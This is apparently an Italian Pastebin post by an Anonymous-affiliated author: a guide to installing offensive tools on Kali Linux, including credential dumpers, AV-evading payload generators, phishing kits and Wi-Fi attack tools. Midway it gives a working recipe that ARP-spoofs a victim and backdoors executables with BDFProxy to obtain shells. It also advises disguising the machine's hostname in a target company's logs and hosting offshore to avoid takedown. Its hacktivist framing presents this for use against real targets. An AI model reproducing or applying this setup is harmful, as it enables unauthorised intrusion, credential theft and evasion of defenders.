Advertisement
AnonITA

Tools&Start - Capitolo 1°

Jun 1st, 2016
359
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.18 KB | None | 0 0
  1.  
  2. /$$
  3. /$$$$
  4. |_ $$
  5. | $$
  6. | $$
  7. | $$
  8. /$$$$$$
  9. |______/tools&&start
  10.  
  11. ,##. ,==.
  12. ,# #. \ o ',
  13. # # _ _ \ \
  14. # # (_) (_) / ;
  15. `# #' / .'
  16. `##' "=="
  17. iniziamo questo corso veloce con lista di programmi di cui abbiamo bisogno e che non sempre sono inclusi o che vanno modificati per la nostra penbox.
  18.  
  19. ---------------------
  20. Recon/scanning Tools
  21. ---------------------
  22. Discover
  23. eyewitness
  24. HTTPScreenShot
  25. WMAP
  26. SpiderFoot
  27. Masscan
  28. Gitrob
  29. CMSmap
  30. Recon-ng
  31. SPARTA
  32. WPScan
  33. PasswordLists
  34. -------------------
  35. Explitation
  36. -------------------
  37. Burp Suite Pro
  38. ZAP Proxy Pro
  39. NoSQLMap
  40. SQLMAP
  41. SQLNinja
  42. BeEF Exploitation Framework
  43. Responder
  44. Printer Exploits
  45. Veil
  46. WIFIPhisher
  47. Wifite
  48. SET
  49. -------------------
  50. Post Exploitation
  51. -------------------
  52. SMBexec
  53. Veil
  54. WCE
  55. Mimikatz
  56. PowerSploit
  57. Nishang
  58. The Backdoor Factory
  59. DSHashes
  60. Net-Creds
  61.  
  62.  
  63. ,##. ,==.
  64. ,# #. \ o ',
  65. # # _ _ \ \
  66. # # (_) (_) / ;
  67. `# #' / .'
  68. `##' "=="
  69. Settare Kaly linux
  70.  
  71. ci sono diverse strade che si possono seguire per organizzare la nostra macchina, ma per seguire tutti gli esempi che potrei riportare da qui in avanti vi consiglio di seguire queste piccole modifiche hai settings.
  72. per mia comodità seguiremo la struttura e gli script contenuti in un libro che ho trovato molto interessante tempo fà (www.thehackerplaybook.com) potete trovare anche le varie opzioni e i software qui: www.github.com/cheetz/thp2
  73. potrebbe semplificarvi l'iserimento dei vari comandi :) ctrl-c/ctrl-z...
  74.  
  75. dato che ci baseremo, e per questo seguiamo questo libro, su kali linux, os più utilizzato da quelli che si affacciano per la prima volta su questo universo. potete scaricarlo qui:
  76. www.kali.org/downloads.
  77. vi consiglio caldamente di scaricare l'immaggine VMWARE e scaricare VirtualPlayer/VirtualBox.
  78.  
  79. Dopo che la vostra macchian virtuale KaliLinux sarà avviata correttamente:
  80. -log in: nome utente root/pass toor (default)
  81. -aprite il terminale
  82. -cambiate password (passwd)
  83. -aggiornate il sistema (apt-get update && apt-get dist-upgrade)
  84. -caricate il Database(DB) di Metasploit (service postgresql enable)
  85. -Start e Stop (service metasploit start/service metasploit stop)
  86. il servizio metasploit, creerà per voi database.yml(If you are using Kali 2.0, they have removed Metasploit Community/Pro from their image (https://www.kali.org/releases/kali-linux-20-released/). Therefore, they do not have a service called metasploit anymore.
  87. In the book's setup phase, there is a section about having to start and stop the metasploit service to build the db (service metasploit start). Instead of this command, just run: msfdb init. That will build the database) per voi.
  88.  
  89.  
  90. -Installate gedit (apt-get install gedit)
  91. -Cambiate l'hostname della vostra macchiana- settatene uno "standard" per la compagnia che andrete a testare ;) molti admin cheranco Kali nei log come DHCP
  92. (gedit /etc/hostname)
  93. -cambiate l'hostname (cambiate kali) e salvate
  94. (gedit /etc/hosts)
  95. -cambiate l'hostname (cambiate kali) e salvate
  96. (reboot)
  97.  
  98.  
  99. opzionalmente abilitate i log di metasploit, i log potrebbero diventare enormi, ma avreste la possibilità di loggare ogni comando. potrebbe diventare molto utile nel caso di "bulk Attack/queries" o nel caso sentiate il bisogno di condividerli.
  100. Se è stato appena installato msf scrivete per prima cosa eseguite -msfconsole, ed uscite così da costruire la cartella .msf4.
  101. da consolele digitate:
  102. echo "spool/root/msf_console.log">/root/.msf4/msfconsole.rc
  103. i log saranno conservati in /root/msfconsole.log
  104.  
  105. In the new version of Kali 2.0, I think the msfconsole.rc was moved from /root/.msf4/msfconsole.rc to /root/.msf5/msfconsole.rc. To configure Metasploit command logging, use the command: echo "spool /root/msf_console.log" > /root/.msf5/msfconsole.rc
  106.  
  107. ********************
  108. As Kali 2.0 broke some tools, I've been trying to find fixes for what I can. The Discover module had goofile broken with the update. To fix this issue in Kali 2.0, run the following commands:
  109.  
  110. wget "https://goofile.googlecode.com/files/goofilev1.5.zip"
  111. unzip -p goofilev1.5.zip goofilev1.5/goofile.py > /usr/bin/goofile && chmod +x /usr/bin/goofile
  112.  
  113. Also, I noticed Discover changed their installation script. In the PREGAME - THE SETUP.
  114.  
  115. OLD:
  116. git clone https://github.com/leebaird/discover.git /opt/discover
  117. cd /opt/discover && ./setup.sh
  118. NEW:
  119. git clone https://github.com/leebaird/discover.git /opt/discover
  120. cd /opt/discover && ./update.sh
  121.  
  122.  
  123.  
  124.  
  125. Discover Tool - Passive Scan
  126.  
  127.  
  128.  
  129. ,##. ,==.
  130. ,# #. \ o ',
  131. # # _ _ \ \
  132. # # (_) (_) / ;
  133. `# #' / .'
  134. `##' "=="
  135. OpenVAS fix kali2.0
  136.  
  137. Looks like a few small changes with Kali 2 on the Setup Phase.
  138. Create Account (instead of openvas-adduser):
  139. openvasmd --user=admin --new-password=admin
  140.  
  141. Login (instead of gsd):
  142. Go to the browser to: https://127.0.0.1:9392
  143.  
  144.  
  145. ,##. ,==.
  146. ,# #. \ o ',
  147. # # _ _ \ \
  148. # # (_) (_) / ;
  149. `# #' / .'
  150. `##' "=="
  151. ________________________________________________________
  152. _ TOOL INSTALLATION _
  153. _________________________list___________________________
  154.  
  155. The Backdoor Factory
  156. Patch PE, ELF, MAch-O binari con codici shell...
  157. git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory
  158. cd the-backdoor-factory
  159. ./install
  160. FIX:
  161. was missing a configuration setting for the BackDoor Factory Proxy (BDFProxy). Make sure in the configuration to modify transparentProxy = transparent. Here's what the full installing and implementation on a fresh Kali image will look like:
  162. apt-get update
  163. apt-get install bdfproxy
  164. apt-get install mitmproxy
  165. apt-get install python-openssl
  166. apt-get install openssl
  167.  
  168. Modify the Config:
  169. vi /etc/bdfproxy/bdfproxy.cfg
  170.  
  171. Change all HOST IPs to your Kali IP
  172. Change transparentProxy = transparent
  173.  
  174.  
  175. Start BDFProxy:
  176. bdfproxy
  177.  
  178. Start the Meterpreter Resource File:
  179. msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
  180.  
  181. Arp Stuff:
  182. sysctl -w net.inet.ip_forwarding=1
  183. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
  184. arpspoof -i eth0 -t victim-ip gateway-ip
  185. arpspoof -i eth0 -t gateway-ip victim-ip
  186.  
  187. And you should be all set. Give it a try by downloading and executing a 32 bit version of Winrar (example: http://www.rarlab.com/rar/wrar521.exe) from your victim host. Watch the shells fall from the sky!
  188. Thanks Joseph from Canada!
  189.  
  190. BackDoor Factory Installation
  191.  
  192. In the tools installation page, there is a directory folder missing for The Backdoor Factory. Replace:
  193. cd the-backdoor-factory
  194. with:
  195. cd /opt/the-backdoor-factory
  196.  
  197.  
  198. ,##. ,==.
  199. ,# #. \ o ',
  200. # # _ _ \ \
  201. # # (_) (_) / ;
  202. `# #' / .'
  203. `##' "=="
  204.  
  205.  
  206. HTTPScreenShot
  207. HTTPScreenshot è un programma che ci permetterà di prendere screenshot e il codice html di molti siti web
  208. pip install selenium
  209. git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot
  210. cd /opt/httpscreenshot
  211. chmao XD +x install-dependencies.sh && ./install-dependencies.sh
  212. httpscreenshot funzionerà solo se avete kali 64 bit, se avete la 32 bit installate i686 phantomjs così:
  213. wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2
  214. bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2
  215. tar xvf phantomjs-1.9.8-linux-i686.tar
  216. cp phantomjs-1.9.8-linux-i686/bin/phantomjs/usr/bin
  217. (controllate ogni link sul libro ufficiale)
  218.  
  219.  
  220. ,##. ,==.
  221. ,# #. \ o ',
  222. # # _ _ \ \
  223. # # (_) (_) / ;
  224. `# #' / .'
  225. `##' "=="
  226.  
  227. SMBExec
  228. un veloce stile di attacco tramite gli strumenti samba
  229. git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec
  230. cd /opt/smbexec && ./install.sh
  231. selezionate 1 - debian/ubuntu and derivates
  232. selezionate il resto come default
  233. ./install.sh
  234. selezionate 4 per compilare i smbexec binaries
  235. finita la compilazione selezionate 5 per uscire
  236.  
  237.  
  238. ,##. ,==.
  239. ,# #. \ o ',
  240. # # _ _ \ \
  241. # # (_) (_) / ;
  242. `# #' / .'
  243. `##' "=="
  244.  
  245.  
  246. Masscan(controllate ogni link sul libro ufficiale)
  247. il più veloce in assoluto portscanner, potrebbe scannerizzare tutta la net in meno di 6 minuti :D
  248. apt-get install git gcc make libcap-dev
  249. git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan
  250. cd /opt/masscan
  251. make
  252. make install
  253.  
  254. ,##. ,==.
  255. ,# #. \ o ',
  256. # # _ _ \ \
  257. # # (_) (_) / ;
  258. `# #' / .'
  259. `##' "=="
  260.  
  261.  
  262. Gitrob
  263. cerca materiale su github
  264. git clone https://github.com/michenriksen/gitrob.git /opt/gitrob
  265. gem install bundler
  266. service postgresql start
  267. su postgres
  268. createuser -s gitrov --pwprompt
  269. createdb -O gitrob gitrob
  270. exit
  271. cd /opt/gitrob/bin
  272. gem install gitrob
  273. *Tiny change configuring GitRob. When running the command: ./gitrob --configure, they now specify the database port. For postgres use port: 5432:
  274.  
  275. ,##. ,==.
  276. ,# #. \ o ',
  277. # # _ _ \ \
  278. # # (_) (_) / ;
  279. `# #' / .'
  280. `##' "=="
  281.  
  282. CMsmap
  283. un programma .py CMS(contentmanagmentsystem)
  284. scanner che ci aiuta a individare vuln.
  285. git clone https://github.com/Dionach/CMSmap /opt/CMSmap
  286.  
  287. ,##. ,==.
  288. ,# #. \ o ',
  289. # # _ _ \ \
  290. # # (_) (_) / ;
  291. `# #' / .'
  292. `##' "=="
  293.  
  294. WPScan
  295. wordpress vuln scanner e sistema di bruteforce
  296. git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan
  297. cd /opt/wpscan && ./wscan.rb --update
  298.  
  299. ,##. ,==.
  300. ,# #. \ o ',
  301. # # _ _ \ \
  302. # # (_) (_) / ;
  303. `# #' / .'
  304. `##' "=="
  305.  
  306. Eyewitness
  307. è scritto epr catturare screenshot dai siti web. osservare alcune server header info e cerca se possibile di identificare le credenziali di default
  308. git clone https://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness
  309.  
  310. ,##. ,==.
  311. ,# #. \ o ',
  312. # # _ _ \ \
  313. # # (_) (_) / ;
  314. `# #' / .'
  315. `##' "=="
  316.  
  317. Printer ExPloits(controllate ogni link sul libro ufficiale)
  318. contiene un tot di exploit
  319. git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit
  320.  
  321. ,##. ,==.
  322. ,# #. \ o ',
  323. # # _ _ \ \
  324. # # (_) (_) / ;
  325. `# #' / .'
  326. `##' "=="
  327.  
  328. SQLMap
  329. softwware per sqlinjection
  330. git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap
  331.  
  332. ,##. ,==.
  333. ,# #. \ o ',
  334. # # _ _ \ \
  335. # # (_) (_) / ;
  336. `# #' / .'
  337. `##' "=="
  338.  
  339. Recon-ng
  340. Un bellissimo tool di ricognizione .py
  341. git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng
  342. Looks like Kali 2.0 broke Recon-NG. If you get the following error "Module 'recon/domains-contacts/metacrawler' disabled. Dependency required: 'PyPDF2'" in Kali 2.0, run the following commands:
  343.  
  344. pip install PyPDF2
  345. pip install olefile
  346.  
  347. ,##. ,==.
  348. ,# #. \ o ',
  349. # # _ _ \ \
  350. # # (_) (_) / ;
  351. `# #' / .'
  352. `##' "=="
  353.  
  354.  
  355. Discover Scripts(controllate ogni link sul libro ufficiale)
  356. bash script che possono essere utilizzati per automatizzare diversi processi di pentest
  357. git clone https://github.com/leebaird/discover.git /opt/discover
  358. cd /opt/discover && ./setup.sh
  359.  
  360. ,##. ,==.
  361. ,# #. \ o ',
  362. # # _ _ \ \
  363. # # (_) (_) / ;
  364. `# #' / .'
  365. `##' "=="
  366.  
  367.  
  368. BeEF Exploitation Framework
  369. piattaforma d'attacco Cross-Site scripting
  370. cd /opt/
  371. wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef
  372. chmod +x install-beef
  373. ./install-beef
  374.  
  375. ,##. ,==.
  376. ,# #. \ o ',
  377. # # _ _ \ \
  378. # # (_) (_) / ;
  379. `# #' / .'
  380. `##' "=="
  381.  
  382.  
  383. Responder
  384. LLMNR, NBT-NS e MDNS poisoner, con già dentro HTTP/SMB/MSSQL/FTP/LDAP rogue server authetication supporting NTLMv1/NTLMv2/LMv2 (vi invito a capire cosa c'è scritto in questa frase molto attentamente come sto facendo io XD)
  385. Extended Security NTLMSSP and basic HTTP authentication.
  386. Responder sarà utilizzato per ottenere NTLM Chalenge/response hashes
  387.  
  388. git clone https://github.com/SpiderLabs/Responder.git /opt/Responder
  389.  
  390. ,##. ,==.
  391. ,# #. \ o ',
  392. # # _ _ \ \
  393. # # (_) (_) / ;
  394. `# #' / .'
  395. `##' "=="
  396.  
  397.  
  398. Custom Script
  399. scritti dall'autore del libro che seguiamo come detto all'inizio e che ci saranno utili nei passi successivi, e in altri ambiti ;)
  400. (controllate ogni link sul libro ufficiale)
  401. git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P
  402.  
  403. git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One
  404.  
  405. git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup
  406.  
  407. git clone https://github.com/cheetz/icmshock /opt/icmpshock
  408.  
  409. git clone https://github.com/cheetz/brutescrape /opt/brutescrape
  410.  
  411. git clone https://github.com/cheetz/reddit_xss /opt/reddit_xss
  412.  
  413. ,##. ,==.
  414. ,# #. \ o ',
  415. # # _ _ \ \
  416. # # (_) (_) / ;
  417. `# #' / .'
  418. `##' "=="
  419.  
  420.  
  421. Forked Version di PowerSploit e powertools usati dopo.(controllate ogni link sul libro ufficiale)
  422. git clone https://github.com/cheetz/PowerSploit /opt/HP_PowerSploit
  423. git clone https://github.com/cheetz/PowerTools /opt/HP_PowerTools
  424. git clone https://github.com/cheetz/nishang /opt/nishang
  425.  
  426. ,##. ,==.
  427. ,# #. \ o ',
  428. # # _ _ \ \
  429. # # (_) (_) / ;
  430. `# #' / .'
  431. `##' "=="
  432.  
  433.  
  434. DSHashes
  435. estrae le hash degli user in un formato comprensibile per NTDSXtract
  436. wget https://storage.googleapis.com/google-code-archive-source/v2/code.google.com/ptscripts/source-archive.zip -O /opt/NTDSXtract/dshashes.py
  437.  
  438.  
  439. ,##. ,==.
  440. ,# #. \ o ',
  441. # # _ _ \ \
  442. # # (_) (_) / ;
  443. `# #' / .'
  444. `##' "=="
  445.  
  446.  
  447. SParta Gui
  448. semplifica la penetrazione 8::::D di strutture network aiutandovi durante lo scan e l'enumerazione.
  449. git clone https://github.com/secforce/sparta.git /opt/sparta
  450. apt-get install python-elixir
  451. apt-get install ldap-utils rwho rsh-client x11-apps finger
  452.  
  453. ,##. ,==.
  454. ,# #. \ o ',
  455. # # _ _ \ \
  456. # # (_) (_) / ;
  457. `# #' / .'
  458. `##' "=="
  459.  
  460.  
  461. NOSQLMap
  462. MongoDB database server e web aplication
  463. git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap
  464.  
  465. ,##. ,==.
  466. ,# #. \ o ',
  467. # # _ _ \ \
  468. # # (_) (_) / ;
  469. `# #' / .'
  470. `##' "=="
  471.  
  472.  
  473. Spiderfoot
  474. FootPrinting Tool
  475. mkdir /opt/spiderfoot/ && cd /opt/spiderfoot
  476. wget "http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz"
  477. tar xzvf spiderfoot-2.3.0-src.tar.gz
  478. pip install lxml
  479. pip install netaddr
  480. pip install M2Crypto
  481. pip install cherrypy
  482. pip install mako
  483.  
  484. ,##. ,==.
  485. ,# #. \ o ',
  486. # # _ _ \ \
  487. # # (_) (_) / ;
  488. `# #' / .'
  489. `##' "=="
  490.  
  491.  
  492. WCE
  493. Windows credential editor (WCE) èusato per tirare fuori le pass dalla memoria
  494. wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
  495. mkdir /opt/wce && unzip wce_v1* -d /opt/wce && rm wce_v1*.zip
  496.  
  497. ,##. ,==.
  498. ,# #. \ o ',
  499. # # _ _ \ \
  500. # # (_) (_) / ;
  501. `# #' / .'
  502. `##' "=="
  503.  
  504.  
  505. Mimikatz
  506. è usato per tirare fuori dalla memoria:
  507. cleartext passwords,Goldenticket,skeleton key e molto altro
  508. https://github.com/gentilkiwi/mimikatz/relases/latest
  509.  
  510. ,##. ,==.
  511. ,# #. \ o ',
  512. # # _ _ \ \
  513. # # (_) (_) / ;
  514. `# #' / .'
  515. `##' "=="
  516.  
  517.  
  518. SET
  519. Social Engineering Toolkit molto utile ne phishing
  520. git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/
  521. cd /opt/set && ./setup.py install
  522.  
  523. ,##. ,==.
  524. ,# #. \ o ',
  525. # # _ _ \ \
  526. # # (_) (_) / ;
  527. `# #' / .'
  528. `##' "=="
  529.  
  530.  
  531. PowerSploit
  532. PowerShell scripts per il post ecploitation
  533. git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit
  534. cd /opt/PowerSploit && wget https://raw.githubuserconetent.com/obscuresec/random/master/StartListener.py $$ wget https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_ecoder.py
  535.  
  536. ,##. ,==.
  537. ,# #. \ o ',
  538. # # _ _ \ \
  539. # # (_) (_) / ;
  540. `# #' / .'
  541. `##' "=="
  542.  
  543.  
  544. Nishang (PowerShell)
  545. collezione di script per exploitare e post exploit
  546. git clone https://github.com/samratashock/nishang /opt/nishang
  547.  
  548. ,##. ,==.
  549. ,# #. \ o ',
  550. # # _ _ \ \
  551. # # (_) (_) / ;
  552. `# #' / .'
  553. `##' "=="
  554.  
  555.  
  556. Veil-Framework
  557. toolkit concetranto sull'evadere la detection rate, contiene Veil-Evasion che genera AV-evading payloads, Veil-Catapult per inviarle al targhet, Veil-PowerView per raggiungere determinati traguardi su domini windows
  558. può essere unsato per creare un Meterprete su base .py eseguibile
  559. git clone https://github.com/Veil-Framework/Veil /opt/Veil
  560. cd /opt/Veil/ $$ ./install.sh -c
  561.  
  562. ,##. ,==.
  563. ,# #. \ o ',
  564. # # _ _ \ \
  565. # # (_) (_) / ;
  566. `# #' / .'
  567. `##' "=="
  568.  
  569.  
  570. Burp Suite Pro
  571. Web Pentest tool
  572. http://portswigger.net/burp/proxy.html
  573. il top sarebbe ottenere la versione professionale, $299 XD
  574.  
  575. ,##. ,==.
  576. ,# #. \ o ',
  577. # # _ _ \ \
  578. # # (_) (_) / ;
  579. `# #' / .'
  580. `##' "=="
  581.  
  582. ZAP PROXY PRO
  583. OWASP ZAP pentest per scoprere vuln nelle applicazioni web
  584. https://code.google.com/p/zaproxy/wiki/Downloads?tm=2
  585.  
  586. ,##. ,==.
  587. ,# #. \ o ',
  588. # # _ _ \ \
  589. # # (_) (_) / ;
  590. `# #' / .'
  591. `##' "=="
  592.  
  593.  
  594. Fuzzing list
  595. script da usare con Burp per fuzzare parametri
  596. git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists
  597.  
  598. ,##. ,==.
  599. ,# #. \ o ',
  600. # # _ _ \ \
  601. # # (_) (_) / ;
  602. `# #' / .'
  603. `##' "=="
  604.  
  605. Passwordlist
  606. Le implemeterò più avanti
  607.  
  608. ,##. ,==.
  609. ,# #. \ o ',
  610. # # _ _ \ \
  611. # # (_) (_) / ;
  612. `# #' / .'
  613. `##' "=="
  614.  
  615. Net-Creds Network Parsing
  616. analizzare i file PCAP per nomeutente/password
  617. git clone https://github.com/DanMcInerney/net-creds.git /opt/net-creds
  618.  
  619. ,##. ,==.
  620. ,# #. \ o ',
  621. # # _ _ \ \
  622. # # (_) (_) / ;
  623. `# #' / .'
  624. `##' "=="
  625.  
  626.  
  627. Firefox addons
  628. web developer add-on
  629. https://addons.mozilla.org/en-US/firefox/addon/web-developer/
  630. temper data
  631. https://addons.mozzilla.org/en-US/firefox/addon/foxyproxy-standard/
  632. User Agent Switcher
  633. https://addons.mozzilla.org/en-US/firefox/addon/user-agent-switcher/
  634.  
  635. ,##. ,==.
  636. ,# #. \ o ',
  637. # # _ _ \ \
  638. # # (_) (_) / ;
  639. `# #' / .'
  640. `##' "=="
  641.  
  642.  
  643. Wifite
  644. attacchi alle reti wifie
  645. git clone https://github.com/derv82/wifite /opt/wifite
  646.  
  647. ,##. ,==.
  648. ,# #. \ o ',
  649. # # _ _ \ \
  650. # # (_) (_) / ;
  651. `# #' / .'
  652. `##' "=="
  653.  
  654.  
  655. WIFIPhisher
  656. Phishing su reti wifie
  657. git clone https://github.com/sophron/wifiphisher.git /opt/wifiphisher
  658.  
  659. ,##. ,==.
  660. ,# #. \ o ',
  661. # # _ _ \ \
  662. # # (_) (_) / ;
  663. `# #' / .'
  664. `##' "=="
  665.  
  666.  
  667. Phishinf-Frenzy
  668. git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy
  669.  
  670. ,##. ,==.
  671. ,# #. \ o ',
  672. # # _ _ \ \
  673. # # (_) (_) / ;
  674. `# #' / .'
  675. `##' "=="
  676.  
  677.  
  678. extra
  679. git clone https://github.com/macubergeek/gitlist.git /opt/gitlist
  680.  
  681.  
  682. ,##. ,==.
  683. ,# #. \ o ',
  684. # # _ _ \ \
  685. # # (_) (_) / ;
  686. `# #' / .'
  687. `##' "=="
  688.  
  689.  
  690. consiglio a tutti di hostare la vostra macchian da pentest offshore
  691. su un hosting "fidato" che non vi chiuda ir ubinetti qualunque obbiettivo voi vi poniate difronte.
  692. un vps potrebbe non bastare.
  693.  
  694. ,##. ,==.
  695. ,# #. \ o ',
  696. # # _ _ \ \
  697. # # (_) (_) / ;
  698. `# #' / .'
  699. `##' "=="
  700.  
  701.  
  702. CHECK KALI SOFTWARE alredy installed, controllate la fonte tramite la quale vi potrebbe arrivare questa 1° parte di guida, controllate ogni link manuamente prima di inviare il comando, spero di esservi utile a continuare la lotta
  703. Anoymous non dimentica
  704. Anonymous non perdona
  705. Anonymous DOCET!
  706. parte 2 Attacchi OSINT ---->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement